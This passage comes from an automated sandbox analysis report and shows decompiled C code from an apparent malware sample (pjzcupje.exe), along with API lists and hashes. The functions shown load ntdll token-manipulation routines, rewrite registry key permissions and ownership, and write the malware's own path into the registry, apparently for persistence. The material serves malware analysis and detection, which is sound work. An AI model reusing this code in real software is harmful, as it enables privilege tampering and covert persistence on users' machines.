											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
											 *0x413930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t31 =  *0x413918; // 0x0
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
												 *0x413934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t13 =  *0x413918; // 0x0
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
													 *0x413938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t27 =  *0x413918; // 0x0
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress(_t27, "NtClose");
														 *0x41393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t32 =  *0x413918; // 0x0
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
															 *0x413940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t17 =  *0x413918; // 0x0
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
																 *0x413944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t28 =  *0x413918; // 0x0
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
																	 *0x413948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t33 =  *0x413918; // 0x0
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress(_t33, "NtFilterToken");
																		 *0x41394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t21 =  *0x413918; // 0x0
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
																			 *0x413950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t29 =  *0x413918; // 0x0
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
																				 *0x413954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x413918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




































                                                                                                                                  0x00401000
                                                                                                                                  0x00401006
                                                                                                                                  0x0040100b
                                                                                                                                  0x00401023
                                                                                                                                  0x0040102a
                                                                                                                                  0x004010c2
                                                                                                                                  0x004010c4
                                                                                                                                  0x004010cb
                                                                                                                                  0x0040127b
                                                                                                                                  0x0040127b
                                                                                                                                  0x004010d1
                                                                                                                                  0x004010d1
                                                                                                                                  0x004010dc
                                                                                                                                  0x004010e1
                                                                                                                                  0x004010e3
                                                                                                                                  0x004010ea
                                                                                                                                  0x00000000
                                                                                                                                  0x004010f0
                                                                                                                                  0x004010f0
                                                                                                                                  0x004010fc
                                                                                                                                  0x00401101
                                                                                                                                  0x00401103
                                                                                                                                  0x0040110a
                                                                                                                                  0x00000000
                                                                                                                                  0x00401110
                                                                                                                                  0x00401110
                                                                                                                                  0x0040111c
                                                                                                                                  0x00401121
                                                                                                                                  0x00401123
                                                                                                                                  0x0040112a
                                                                                                                                  0x00000000
                                                                                                                                  0x00401130
                                                                                                                                  0x00401130
                                                                                                                                  0x0040113b
                                                                                                                                  0x00401140
                                                                                                                                  0x00401142
                                                                                                                                  0x00401149
                                                                                                                                  0x00000000
                                                                                                                                  0x0040114f
                                                                                                                                  0x0040114f
                                                                                                                                  0x0040115b
                                                                                                                                  0x00401160
                                                                                                                                  0x00401162
                                                                                                                                  0x00401169
                                                                                                                                  0x00000000
                                                                                                                                  0x0040116f
                                                                                                                                  0x0040116f
                                                                                                                                  0x0040117b
                                                                                                                                  0x00401180
                                                                                                                                  0x00401182
                                                                                                                                  0x00401189
                                                                                                                                  0x00000000
                                                                                                                                  0x0040118f
                                                                                                                                  0x0040118f
                                                                                                                                  0x0040119a
                                                                                                                                  0x0040119f
                                                                                                                                  0x004011a1
                                                                                                                                  0x004011a8
                                                                                                                                  0x00000000
                                                                                                                                  0x004011ae
                                                                                                                                  0x004011ae
                                                                                                                                  0x004011ba
                                                                                                                                  0x004011bf
                                                                                                                                  0x004011c1
                                                                                                                                  0x004011c8
                                                                                                                                  0x00000000
                                                                                                                                  0x004011ce
                                                                                                                                  0x004011ce
                                                                                                                                  0x004011da
                                                                                                                                  0x004011df
                                                                                                                                  0x004011e1
                                                                                                                                  0x004011e8
                                                                                                                                  0x00000000
                                                                                                                                  0x004011ee
                                                                                                                                  0x004011ee
                                                                                                                                  0x004011f9
                                                                                                                                  0x004011fe
                                                                                                                                  0x00401200
                                                                                                                                  0x00401207
                                                                                                                                  0x00000000
                                                                                                                                  0x00401209
                                                                                                                                  0x00401209
                                                                                                                                  0x00401215
                                                                                                                                  0x0040121a
                                                                                                                                  0x0040121c
                                                                                                                                  0x00401223
                                                                                                                                  0x00000000
                                                                                                                                  0x00401225
                                                                                                                                  0x00401225
                                                                                                                                  0x00401231
                                                                                                                                  0x00401236
                                                                                                                                  0x00401238
                                                                                                                                  0x0040123f
                                                                                                                                  0x00000000
                                                                                                                                  0x00401241
                                                                                                                                  0x00401241
                                                                                                                                  0x0040124c
                                                                                                                                  0x00401251
                                                                                                                                  0x00401253
                                                                                                                                  0x0040125a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040125c
                                                                                                                                  0x0040125c
                                                                                                                                  0x00401268
                                                                                                                                  0x0040126d
                                                                                                                                  0x0040126f
                                                                                                                                  0x00401276
                                                                                                                                  0x00401276
                                                                                                                                  0x00401279
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401279
                                                                                                                                  0x0040125a
                                                                                                                                  0x0040123f
                                                                                                                                  0x00401223
                                                                                                                                  0x00401207
                                                                                                                                  0x004011e8
                                                                                                                                  0x004011c8
                                                                                                                                  0x004011a8
                                                                                                                                  0x00401189
                                                                                                                                  0x00401169
                                                                                                                                  0x00401149
                                                                                                                                  0x0040112a
                                                                                                                                  0x0040110a
                                                                                                                                  0x004010ea
                                                                                                                                  0x0040127f
                                                                                                                                  0x004010ae
                                                                                                                                  0x004010b4
                                                                                                                                  0x004010b4
                                                                                                                                  0x0040100d
                                                                                                                                  0x00401012
                                                                                                                                  0x00401018
                                                                                                                                  0x0040101f
                                                                                                                                  0x00000000
                                                                                                                                  0x00401022
                                                                                                                                  0x00401022
                                                                                                                                  0x00401022
                                                                                                                                  0x0040101f

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 004010E1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00401101
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00401121
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00401140
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00401160
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00401180
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040119F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtClose), ref: 004011BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004011DF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 004011FE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                  • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                                                                  • API String ID: 2238633743-3228201535
                                                                                                                                  • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                                                                  • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                                                                  • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                                                                  • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040B211 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0040ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}





































                                                                                                                                  0x0040b225
                                                                                                                                  0x0040b22c
                                                                                                                                  0x0040b233
                                                                                                                                  0x0040b23a
                                                                                                                                  0x0040b241
                                                                                                                                  0x0040b248
                                                                                                                                  0x0040b24f
                                                                                                                                  0x0040b256
                                                                                                                                  0x0040b25d
                                                                                                                                  0x0040b264
                                                                                                                                  0x0040b26b
                                                                                                                                  0x0040b272
                                                                                                                                  0x0040b279
                                                                                                                                  0x0040b280
                                                                                                                                  0x0040b287
                                                                                                                                  0x0040b28e
                                                                                                                                  0x0040b295
                                                                                                                                  0x0040b29c
                                                                                                                                  0x0040b2a3
                                                                                                                                  0x0040b2ad
                                                                                                                                  0x0040b2c2
                                                                                                                                  0x0040b2d0
                                                                                                                                  0x0040b2af
                                                                                                                                  0x0040b2b3
                                                                                                                                  0x0040b2b3
                                                                                                                                  0x0040b2d2
                                                                                                                                  0x0040b2d7
                                                                                                                                  0x0040b2e1
                                                                                                                                  0x0040b2e7
                                                                                                                                  0x0040b2f0
                                                                                                                                  0x0040b306
                                                                                                                                  0x0040b30c
                                                                                                                                  0x0040b30f
                                                                                                                                  0x0040b2f2
                                                                                                                                  0x0040b2f4
                                                                                                                                  0x0040b2fa
                                                                                                                                  0x0040b2fd
                                                                                                                                  0x0040b2fd
                                                                                                                                  0x0040b31a
                                                                                                                                  0x0040b31a
                                                                                                                                  0x0040b323
                                                                                                                                  0x0040b329
                                                                                                                                  0x0040b32f
                                                                                                                                  0x0040b338
                                                                                                                                  0x0040b33a
                                                                                                                                  0x0040b33a
                                                                                                                                  0x0040b33d
                                                                                                                                  0x0040b341
                                                                                                                                  0x0040b344
                                                                                                                                  0x0040b34b
                                                                                                                                  0x0040b34f
                                                                                                                                  0x0040b350
                                                                                                                                  0x0040b350
                                                                                                                                  0x0040b358
                                                                                                                                  0x0040b35d
                                                                                                                                  0x0040b35d
                                                                                                                                  0x0040b366
                                                                                                                                  0x0040b36a
                                                                                                                                  0x0040b36b
                                                                                                                                  0x0040b36b
                                                                                                                                  0x0040b371
                                                                                                                                  0x0040b376
                                                                                                                                  0x0040b378
                                                                                                                                  0x0040b378
                                                                                                                                  0x0040b37f
                                                                                                                                  0x0040b380
                                                                                                                                  0x0040b3c4

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                                                                  • wsprintfA.USER32 ref: 0040B3B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                                                                  • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                                                                  • API String ID: 766114626-2976066047
                                                                                                                                  • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                                                                  • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00407A95 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                  			E00407A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				int _t148;
				int _t151;
				char* _t158;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28);
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173);
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x412cc0; // 0x1
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t158 = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe";
						_t126 = _t158;
						_t174 =  &(_t126[1]);
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00402544(0x4122f8, 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1);
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x412cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175);
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}



















































                                                                                                                                  0x00407aae
                                                                                                                                  0x00407ab4
                                                                                                                                  0x00407ab7
                                                                                                                                  0x00407ac2
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ac4
                                                                                                                                  0x00407adc
                                                                                                                                  0x00407adf
                                                                                                                                  0x00407ae5
                                                                                                                                  0x00407ae7
                                                                                                                                  0x00407da7
                                                                                                                                  0x00407daa
                                                                                                                                  0x00000000
                                                                                                                                  0x00407aed
                                                                                                                                  0x00407b0c
                                                                                                                                  0x00407b13
                                                                                                                                  0x00407b16
                                                                                                                                  0x00407b1c
                                                                                                                                  0x00407b1e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b34
                                                                                                                                  0x00407b3b
                                                                                                                                  0x00407b41
                                                                                                                                  0x00407b43
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b59
                                                                                                                                  0x00407b5f
                                                                                                                                  0x00407b61
                                                                                                                                  0x00407bb8
                                                                                                                                  0x00407bcb
                                                                                                                                  0x00407bce
                                                                                                                                  0x00407bd4
                                                                                                                                  0x00407bd6
                                                                                                                                  0x00407da6
                                                                                                                                  0x00000000
                                                                                                                                  0x00407da6
                                                                                                                                  0x00407bdc
                                                                                                                                  0x00407bdf
                                                                                                                                  0x00407be1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407be9
                                                                                                                                  0x00407beb
                                                                                                                                  0x00407bee
                                                                                                                                  0x00407bf2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407bf8
                                                                                                                                  0x00407bf8
                                                                                                                                  0x00407c00
                                                                                                                                  0x00407c06
                                                                                                                                  0x00407c08
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00000000
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00407c14
                                                                                                                                  0x00407c16
                                                                                                                                  0x00407c19
                                                                                                                                  0x00407c1b
                                                                                                                                  0x00407c4f
                                                                                                                                  0x00407c4f
                                                                                                                                  0x00407c52
                                                                                                                                  0x00407c57
                                                                                                                                  0x00407c5e
                                                                                                                                  0x00407c5e
                                                                                                                                  0x00407c5e
                                                                                                                                  0x00407c66
                                                                                                                                  0x00407c6c
                                                                                                                                  0x00407c6f
                                                                                                                                  0x00407c71
                                                                                                                                  0x00407c86
                                                                                                                                  0x00407c73
                                                                                                                                  0x00407c78
                                                                                                                                  0x00407c7f
                                                                                                                                  0x00407c7f
                                                                                                                                  0x00407c8b
                                                                                                                                  0x00407c8e
                                                                                                                                  0x00407c90
                                                                                                                                  0x00407c93
                                                                                                                                  0x00407c96
                                                                                                                                  0x00407c96
                                                                                                                                  0x00407c9d
                                                                                                                                  0x00407c9f
                                                                                                                                  0x00407ca7
                                                                                                                                  0x00407ca7
                                                                                                                                  0x00407ca9
                                                                                                                                  0x00407cac
                                                                                                                                  0x00407cb2
                                                                                                                                  0x00407cb2
                                                                                                                                  0x00407cb5
                                                                                                                                  0x00407cc3
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ca1
                                                                                                                                  0x00407ca1
                                                                                                                                  0x00407ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c1d
                                                                                                                                  0x00407c1d
                                                                                                                                  0x00407c27
                                                                                                                                  0x00407c2d
                                                                                                                                  0x00407c2f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c31
                                                                                                                                  0x00407c32
                                                                                                                                  0x00407c34
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c34
                                                                                                                                  0x00407c36
                                                                                                                                  0x00407c38
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c40
                                                                                                                                  0x00407c46
                                                                                                                                  0x00407cc9
                                                                                                                                  0x00407cc9
                                                                                                                                  0x00407cd0
                                                                                                                                  0x00407cd0
                                                                                                                                  0x00407cd9
                                                                                                                                  0x00407cdc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ce2
                                                                                                                                  0x00407ce8
                                                                                                                                  0x00407d5a
                                                                                                                                  0x00407d61
                                                                                                                                  0x00407d6a
                                                                                                                                  0x00407d6c
                                                                                                                                  0x00407d6e
                                                                                                                                  0x00407d72
                                                                                                                                  0x00407d78
                                                                                                                                  0x00407d7a
                                                                                                                                  0x00407d82
                                                                                                                                  0x00407d88
                                                                                                                                  0x00407d8a
                                                                                                                                  0x00407d92
                                                                                                                                  0x00407d98
                                                                                                                                  0x00407d9a
                                                                                                                                  0x00407d9c
                                                                                                                                  0x00407d9c
                                                                                                                                  0x00407d9a
                                                                                                                                  0x00407d8a
                                                                                                                                  0x00407da0
                                                                                                                                  0x00407da0
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d6e
                                                                                                                                  0x00407cea
                                                                                                                                  0x00407cf0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407cff
                                                                                                                                  0x00407d05
                                                                                                                                  0x00407d0b
                                                                                                                                  0x00407d0d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d0f
                                                                                                                                  0x00407d14
                                                                                                                                  0x00407d16
                                                                                                                                  0x00407d19
                                                                                                                                  0x00407d19
                                                                                                                                  0x00407d1b
                                                                                                                                  0x00407d1c
                                                                                                                                  0x00407d1c
                                                                                                                                  0x00407d4a
                                                                                                                                  0x00407d50
                                                                                                                                  0x00407d52
                                                                                                                                  0x00407d54
                                                                                                                                  0x00407d54
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d52
                                                                                                                                  0x00407b6a
                                                                                                                                  0x00407b70
                                                                                                                                  0x00407b72
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b7b
                                                                                                                                  0x00407b84
